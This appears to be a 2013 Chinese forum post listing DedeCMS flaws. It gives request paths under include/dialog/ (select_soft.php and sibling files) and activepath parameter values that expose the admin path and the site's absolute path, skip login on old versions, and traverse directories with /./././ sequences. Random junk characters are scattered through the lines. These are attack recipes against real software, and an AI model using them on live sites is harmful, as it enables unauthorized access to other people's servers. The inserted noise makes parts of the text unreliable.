1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理$ v; Q4 @ s \9 a6 D- `
) L. H1 f. X8 `+ b! J: p. m* p# Q员帐号,新版本的就直接转向了后台.4 u* { C, n) Y% Y8 L" w$ R$ F
! }3 e& q7 T; a7 O1 Q; g
2.include/dialog/config.php会爆出后台管理路径
% |4 ^- r3 V5 `8 h. D2 @, R
; i# i& t- [. \- m3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录9 g; P6 x. e/ k4 S, \* o; `. g
" |, J6 T7 D9 `4 `' ?$ k: r( ~
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.. P4 n7 P6 C* n' B0 ?' y
3 M) [9 T/ v/ m+ {, s( ?
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
( c* U" H$ l ]/ v2 |# }4 f' w# n/ t5 d$ a% n
到根目录去.不过这些版本的访问地址有些不同.6 X3 f1 @& M3 E% W' T
地址为require/dialog/select_soft.php?activepath=/././././././././" o/ d: f7 T! b. K/ z/ D
" `3 ]- K P. @& k2 @7 A
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
* S: g# O, H z存在相同问题的文件还有
+ d7 |2 s: l! zinclude\dialog\select_images.php1 {7 N1 w9 ]$ i' G. ?. b* \
include\dialog\select_media.php* w/ Z. ^8 M- s$ @3 I# h
include\dialog\select_templets.php
9 g& }8 c) R' q. {( ~3 r2 }9 T# a |
发表于 2013-4-16 16:50:43
收藏
支持
反对